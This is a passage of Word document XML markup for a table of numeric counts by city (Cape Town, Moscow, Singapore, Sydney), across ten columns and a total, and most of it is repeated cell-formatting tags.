              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02679276"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6A5BDB"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D52DA18"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E85AD07"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="594BA502"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Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="4222D334" w14:textId="77777777" w:rsidTr="001C3F72">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71E5914E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cape Town, South Africa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F044125"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642</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3143D9D2"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640</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13081BAB"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642</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="391A2273"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809</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AA85983"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654</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="677ED838"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1619</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0839D030"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755</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF46DDF"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791</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3827D2D6"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762</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AD038E0"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818</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5122E11C"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8132</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="0598578E" w14:textId="77777777" w:rsidTr="001C3F72">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4D0D382C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Moscow, Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F30D85D"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486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE91C3C"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486</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CED0955"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488</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C8BCC0E"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515</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A202E8C"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475</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FA67544"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642</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FEDABB1"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491</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE04DB0"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664</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57112F1B"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478</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4948F44D"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457</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ED1117B"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5182</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="07827F9C" w14:textId="77777777" w:rsidTr="001C3F72">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40639B15" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Singapore, Singapore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48414CD2"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660</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C2CE61D"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478</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3184A780"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488</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="491A9F7C"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466</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D65248D"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1073</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C37FA28"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807</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A84AE92"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495</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F29C8F0"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518</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="310E9E58"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532</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18DD52E3"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473</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DC19BCA"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5990</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="5A915CEC" w14:textId="77777777" w:rsidTr="001C3F72">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34663474" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Sydney, Australia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FF70322"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390</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524003A5"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410</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CD8B80A"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393</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21195571"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380</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63EF82A0"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511</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76732544"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1153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
